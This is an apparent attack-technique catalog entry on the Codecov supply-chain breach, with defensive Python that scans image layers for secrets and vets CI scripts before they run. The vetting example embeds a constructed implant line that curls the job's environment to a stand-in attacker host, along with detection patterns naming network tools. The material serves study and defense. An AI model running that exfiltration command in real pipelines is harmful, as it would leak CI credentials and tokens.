AS3 - Codecov Breach

Codecov is a popular code coverage utility that runs as a step in the CI/CD pipelines of many companies.

Techniques:

Reconnaissance

T0103 - Scan Public Artifacts For Secrets

The attackers scanned Docker Hub and discovered git credentials inside the official Codecov image.
T0103 page

T0142 - Accidental Public Disclosure Of Internal Resources

The git credentials were inadvertently saved into the public Docker image during the image build.
T0142 page
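An added example of the reconnaissance step described above (this is illustrative code, not Codecov's or the attackers' tooling): scanning the files inside a container-image layer for credentials that a build left behind. The layer tarball, the file names and the secret values are all constructed in memory so the scanner runs offline; against a real image you would feed it each layer of the pulled image in turn.

```python
"""Scan a container-image layer tarball for credentials baked in by mistake
(T0103 / T0142).  The layer below is CONSTRUCTED for this example."""
import io
import re
import tarfile

# Patterns for secrets commonly found in images.  ``.git-credentials`` stores
# "https://user:token@host" lines, so a single URL regex catches that format.
SECRET_PATTERNS = {
    "git_credentials_url": re.compile(r"https?://[^:\s/]+:[^@\s]+@[^\s]+"),
    "github_token": re.compile(r"\bgh[pousr]_[A-Za-z0-9]{36}\b"),
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "private_key_block": re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----"),
}

# Files whose mere presence in a public image is a finding.
SENSITIVE_PATHS = (".git-credentials", ".netrc", ".env", "id_rsa", ".npmrc")


def build_sample_layer() -> bytes:
    """Constructed layer: an app plus credential files a build step left behind.
    The token and key values are placeholders, not real secrets."""
    files = {
        "app/main.py": b"print('hello')\n",
        "root/.git-credentials": b"https://ci-bot:ghp_" + b"a" * 36 + b"@github.com\n",
        "app/.env": b"AWS_ACCESS_KEY_ID=AKIA" + b"A" * 16 + b"\nDEBUG=1\n",
    }
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name, data in files.items():
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def redact(secret: str) -> str:
    """Never log a full secret; keep just enough to locate the hit."""
    return secret[:8] + "..." if len(secret) > 8 else secret


def scan_layer(layer: bytes, max_file_size: int = 1 << 20) -> list[dict]:
    """Return one finding per sensitive file name and per secret-pattern match."""
    findings = []
    with tarfile.open(fileobj=io.BytesIO(layer), mode="r") as tar:
        for member in tar:
            if not member.isfile():
                continue
            basename = member.name.rsplit("/", 1)[-1]
            if basename in SENSITIVE_PATHS:
                findings.append({"path": member.name, "kind": "sensitive_file",
                                 "match": basename})
            if member.size > max_file_size:  # skip large binaries
                continue
            data = tar.extractfile(member).read().decode("utf-8", errors="replace")
            for kind, pattern in SECRET_PATTERNS.items():
                for m in pattern.finditer(data):
                    findings.append({"path": member.name, "kind": kind,
                                     "match": redact(m.group(0))})
    return findings


if __name__ == "__main__":
    for f in scan_layer(build_sample_layer()):
        print(f"{f['kind']:22s} {f['path']}  {f['match']}")
```

The scanner reports both the file-name hit and the content hit for `.git-credentials`, which is the shape of the finding in this incident: a credential file that should never have been in an image at all.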

Initial Access

T0114 - Compromised Service Account

Using the leaked credentials, the attackers gained access to Codecov's Git repository.
T0114 page

Impact

T0191 - Malicious Code In Artifacts

The Bash Uploader script was modified to exfiltrate the environment variables of the system running it.
T0191 page

Resource Development

T0121 - Compromised Legitimate Artifact

T0121 page

Initial Access

T0122 - Vulnerability In Third-Party CI/CD Actions

The Bash Uploader script was also wrapped by third-party GitHub Actions and other CI integrations, so pipelines that never called the script directly still ran the tampered version.
T0122 page

Execution

T0118 - Command Injection

When a CI job ran the Bash Uploader (directly, or via the Codecov image or a wrapping action), the malicious implant exfiltrated the job's environment variables to an attacker-controlled server.
T0118 page

T0159 - Malicious Artifact Execution

Customers whose pipelines executed the Codecov image or uploader were impacted.
T0159 page

Credential Access

T0140 - Harvest Tokens From Environment Variables

T0140 page
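An added example covering the Impact, Execution and Credential Access steps above (illustrative code, not Codecov's script or the real implant): a pre-execution check for a third-party CI helper script. It pins the script's SHA-256 to a reviewed value, which a pipeline that pipes `curl` straight into `bash` never does, and additionally flags any shell command that dumps the environment and hands it to a network client, the exfiltration shape described for the tampered uploader. Both scripts, the hostnames (`example.invalid`, `attacker.invalid`) and the appended implant line are constructed for the example.

```python
"""Vet a third-party CI helper script before running it: integrity (T0121/T0191)
and environment-exfiltration content (T0140).  All inputs are CONSTRUCTED."""
import hashlib
import hmac
import re

# "$(env)", "$(printenv)", "$(export -p)" or "env |" / "printenv |": the
# environment being captured for use by another command.
ENV_DUMP = re.compile(r"\$\(\s*(env|printenv|export -p)\s*\)|\b(env|printenv)\s*\|")
# Tools that can move that capture off the host.
NET_SEND = re.compile(r"\b(curl|wget|nc|ncat|socat)\b")

CLEAN_SCRIPT = """#!/usr/bin/env bash
set -euo pipefail
report="$(find . -name 'coverage.xml' | head -n1)"
curl -sS -X POST --data-binary @"$report" "https://example.invalid/upload?token=$CODECOV_TOKEN"
"""

# Constructed implant: one appended line that posts the environment elsewhere,
# mimicking the behaviour described for the tampered Bash Uploader.
TAMPERED_SCRIPT = CLEAN_SCRIPT + """
# one appended line: every CI secret goes to a host the attacker controls
curl -sm 0.5 -d "$(git remote -v)<<<<<< ENV $(env)" http://attacker.invalid/upload || true
"""


def sha256_hex(text: str) -> str:
    return hashlib.sha256(text.encode()).hexdigest()


# In a real pipeline this is a literal checked into the repository alongside
# the version of the script you reviewed; here it is derived from CLEAN_SCRIPT.
PINNED_SHA256 = sha256_hex(CLEAN_SCRIPT)


def logical_lines(script: str):
    """Yield (first_line_no, text) with backslash continuations joined, so a
    command split across physical lines is scanned as one unit."""
    buf, start = [], None
    for no, line in enumerate(script.splitlines(), 1):
        if start is None:
            start = no
        if line.endswith("\\"):
            buf.append(line[:-1])
            continue
        buf.append(line)
        yield start, " ".join(buf)
        buf, start = [], None
    if buf:  # script ended on a continuation line
        yield start, " ".join(buf)


def find_exfil_lines(script: str) -> list[int]:
    """Line numbers where an environment dump and a network client co-occur."""
    return [no for no, text in logical_lines(script)
            if ENV_DUMP.search(text) and NET_SEND.search(text)]


def vet_script(script: str, pinned_sha256: str) -> dict:
    """Allow execution only if the hash matches AND no exfiltration line is found.
    The content check is a second line of defence for the day the pin is stale."""
    integrity_ok = hmac.compare_digest(sha256_hex(script), pinned_sha256)
    exfil = find_exfil_lines(script)
    return {"integrity_ok": integrity_ok, "exfil_lines": exfil,
            "allowed": integrity_ok and not exfil}


if __name__ == "__main__":
    for label, script in (("clean", CLEAN_SCRIPT), ("tampered", TAMPERED_SCRIPT)):
        print(label, vet_script(script, PINNED_SHA256))
```

The hash check alone would have blocked the tampered script; the content check matters for pipelines that cannot pin (for example, a wrapping action that fetches the latest uploader itself), where the only option is to inspect what was fetched before handing it to `bash`.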

Legend (attack-flow diagram): Codecov; Codecov users